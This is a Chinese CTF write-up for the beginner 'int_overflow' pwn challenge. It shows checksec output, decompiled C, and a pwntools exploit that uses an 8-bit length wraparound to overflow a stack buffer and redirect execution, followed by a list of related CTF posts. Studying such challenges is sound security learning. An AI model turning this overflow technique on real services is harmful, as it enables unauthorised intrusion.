2. 程式人生 > 實用技巧 >『攻防世界』:新手區 | int_overflow

『攻防世界』:新手區 | int_overflow

阿新 發佈:2020-08-01

checksec:

    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

IDA:

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int v4; // [esp+Ch] [ebp-Ch]

  setbuf(stdin, 0);
  setbuf(stdout, 0);
  setbuf(stderr, 
 
0);
  puts("---------------------");
  puts("~~ Welcome to CTF! ~~");
  puts("       1.Login       ");
  puts("       2.Exit        ");
  puts("---------------------");
  printf("Your choice:");
  __isoc99_scanf("%d", &v4);
  if ( v4 == 1 )
  {
    login();
  }
  else
  {
    if ( v4 == 2 )
    {
      puts(
 
"Bye~");
      exit(0);
    }
    puts("Invalid Choice!");
  }
  return 0;
}

2

char *login()
{
  char passw; // [esp+0h] [ebp-228h]
  char name; // [esp+200h] [ebp-28h]

  memset(&name, 0, 0x20u);
  memset(&passw, 0, 0x200u);
  puts("Please input your username:");
  read(0, &name, 0x19u);
  printf("Hello %s\n
 
", &name);
  puts("Please input your passwd:");
  read(0, &passw, 0x199u);
  return check_passwd(&passw);
}

3

char *__cdecl check_passwd(char *s)
{
  char *result; // eax
  char dest; // [esp+4h] [ebp-14h]
  unsigned __int8 v3; // [esp+Fh] [ebp-9h]

  v3 = strlen(s);
  if ( v3 <= 3u || v3 > 8u )
  {
    puts("Invalid Password");
    result = (char *)fflush(stdout);
  }
  else
  {
    puts("Success");
    fflush(stdout);
    result = strcpy(&dest, s);
  }
  return result;
}

exp:

from pwn import *

io = remote('ip',port)
io.sendlineafter('choice:','1')
io.sendlineafter('username:','beef')
payload = b'a'*24 + p32(0x804868b) 
payload = payload.ljust(259,"A")
io.sendlineafter('passwd:',payload)
io.interactive()

相關推薦

攻防世界新手 | int_overflow

checksec: Arch:i386-32-little RELRO:Partial RELRO Stack:No canary found NX:NX enabled PIE:No PIE (0x8048000)

攻防世界新手 | strings

checksec: Arch:amd64-64-little RELRO:Full RELRO Stack:Canary found NX:NX enabled PIE:No PIE (0x400000) IDA:

攻防世界新手 | CGfsb

checksec Arch:i386-32-little RELRO:Partial RELRO Stack:Canary found NX:NX enabled PIE:No PIE (0x8048000)

攻防世界新手 | CRYPTO

在正式做題前先要大致瞭解一下CRYPTO 0x1: base64 將文字內容如題解密 Y3liZXJwZWFjZXtXZWxjb21lX3RvX25ld19Xb3JsZCF9

攻防世界進階 | stack2

checksec Arch:i386-32-little RELRO:Partial RELRO Stack:Canary found NX:NX enabled PIE:No PIE (0x8048000)

攻防世界進階 | Mary_Morton

這道題讓我重新學了一遍格式化字串漏洞,自學真的太頂了。 checksec開啟了canary

攻防世界進階 | warmup

這道題感覺有點怪怪的,題目頁面並沒有給出附件,實驗了下可以開啟線上場景

攻防世界新手 | when_did_you_born

checksec檢視程式型別 有Canary,先看看程式邏輯 [*] \'/home/zowie/Downloads/when_did_you_born\'

攻防世界新手 | guess number

checksec程式資訊 Arch:amd64-64-little RELRO:Partial RELRO Stack:Canary found NX:NX enabled PIE:PIE enabled

攻防世界-高手進階通關筆記

高手進階-通關筆記 baby_web 根據提示想想初始頁面是哪個 我們輸入index.php發現還是回到了1.php,應該是重定向了,此處有兩種思路

攻防世界_MISC進階_Get-the-key.txt(詳細)

攻防世界MISC進階之Get-the-key.txt 啥話也不說,咱們直接看題吧! 首先下載附件看到一個壓縮包

攻防世界之misc新手入門——掀桌子

技術標籤攻防世界wp之miscpythonpycharm經驗分享 攻防世界之misc新手入門——掀桌子

攻防世界-webwarmup

題目描述 暫無 題目截圖 解題思路 訪問標題連結,發現圖片是個大大笑臉。直接看原始碼。

攻防世界-webPHP2

題目描述 暫無 題目截圖 只提示了一句話Can you anthenticate to this website? 估計是讓認證繞過,登入網站。

攻防世界-webunserialize3

題目描述 暫無 題目截圖 根據題目名稱,應該就是php反序列化。 解題思路 class xctf

攻防世界-webWeb_python_template_injection

題目描述 暫無 題目截圖 解題思路 題目提示是python模板注入 嘗試訪問不存在路徑,看看404頁面

攻防世界MISC—進階1-10

1.something_in_image zip中的檔案用010 Editor開啟後直接搜尋flag,即可找到flag 2.wireshark-1

攻防世界MISC—進階21-30

21.easycap 得到一個pcap檔案,協議分級統計,發現都是TCP協議 直接追蹤tcp流,得到FLAG

攻防世界 高手 serial-150 WP \ IDA遠端動態除錯適合新手

攻防世界 高手 serial-150 WP \\ IDA遠端動態除錯適合新手 1.脫殼分析2.IDA遠端動態除錯——連線補充一下遠端連線前面的步驟第一步第二步第三步

攻防世界新手 SOCKETwp

level2 import socket from socket import AF_INET,SOCK_STREAM import struct import time connection = socket.socket(AF_INET,SOCK_STREAM,0) connection.connect((\'111.198.29.45\',57758)) payload = \'a\'*0x